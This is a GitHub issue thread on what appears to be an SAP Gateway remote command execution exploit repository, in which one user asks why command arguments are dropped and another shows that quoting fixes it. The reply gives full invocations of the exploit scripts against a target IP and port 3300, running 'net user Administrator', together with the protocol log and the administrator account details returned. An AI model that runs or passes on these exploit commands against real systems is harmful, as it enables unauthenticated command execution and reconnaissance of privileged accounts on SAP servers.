chipik/SAP_GW_RCE_exploit

Commands with space

Opened this issue · 1 comments

I am currently playing with the exploit.
One-word commands are working perfectly, but when I try to run commands with parameters, it seems to ignore them. For example, whoami returns my username, but whoami --help also returns the username.

Is it possible to encode the command string so that parameters after a space are passed as well?

Hi @vsegdacocacola,
for me it works when I try to send e.g. "net user Administrator" or "whoami /all".

Example 1:

python SAPanonGWv2.py -t 172.20.10.100 -c "net user Administrator" -p 3300
[INFO ] [+] Sending GW_NORMAL_CLIENT
[INFO ] Response: OK
[INFO ] [+] Sending F_SAP_INIT
[INFO ] Response: OK
[INFO ] [+] Sending F_SAP_SEND
[INFO ] [+] Sending F_SAP_SEND2
User name                    Administrator
Full Name
Comment                      Built-in account for administering the computer/domain
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            30.03.2015 10:01:34
Password expires             11.05.2015 10:01:34
Password changeable          30.03.2015 10:01:34
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   30.03.2015 14:04:06

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *None
The command completed successfully.

Example 2:

python SAPanonGWv1.py -t 172.20.10.100 -c "net user Administrator" -p 3300
[*] sending cmd:net user Administrator
User name                    Administrator

Full Name
TComment                      Built-in account for administering the computer/domain
User's comment
2Country/region code          000 (System Default)
!Account active               Yes
#Account expires              Never

1Password last set            30.03.2015 10:01:34
1Password expires             11.05.2015 10:01:34
1Password changeable          30.03.2015 10:01:34
!Password required            Yes
!User may change password     Yes

!Workstations allowed         All
Logon script
User profile
Home directory
1Last logon                   30.03.2015 14:04:06

!Logon hours allowed          All

-Local Group Memberships      *Administrators
#Global Group memberships     *None
$The command completed successfully.

The quotes did the trick for me. Maybe this will help you.